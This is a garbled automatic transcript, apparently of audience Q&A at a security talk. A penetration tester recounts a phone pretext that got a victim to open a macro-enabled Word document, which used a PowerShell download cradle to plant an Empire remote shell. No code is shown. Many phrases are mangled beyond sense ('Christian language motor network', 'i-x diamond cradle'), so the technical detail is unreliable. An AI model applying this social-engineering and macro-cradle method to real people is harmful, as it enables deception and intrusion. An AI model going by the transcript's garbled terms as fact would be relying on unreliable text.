with AppLocker and if I'm not a hundred percent sure on that I could point you in the right place where I know you can get the answer for sure I've not personally deployed a blocker or deployed Christian language motor network like Matt was saying earlier I get the beauty of breaking people stuff and tell them to fix it I don't have to fix anything so blue team stuff is kind of I see I know what I'm supposed to do the donation I've never had to implement it you know you got that thing at how technology is supposed to work and are you trying to roll it out and it was really paying the button you would have

never thought it would be that way so in theory that's all you got to do I've not actually set it up you have questions the i-x diamond cradle oh yes yes in fact I just did a pretext engagement a week ago where I called somebody on the phone and I told them I needed them to download this web form for me I didn't know what to go I didn't know what goes in this block 8 I told him so he downloads it and his company had macros enabled onboard documents as soon as he opened the word doc I had an empire shell back because I use PowerShell Nayak's demo cradle and I got myself an

empire agent on his computer right off the bat just effective we're talking just like the malware does again I use the i-x download cradle to pull my shut myself an empire shell onto the computer any other questions No thanks for your time appreciate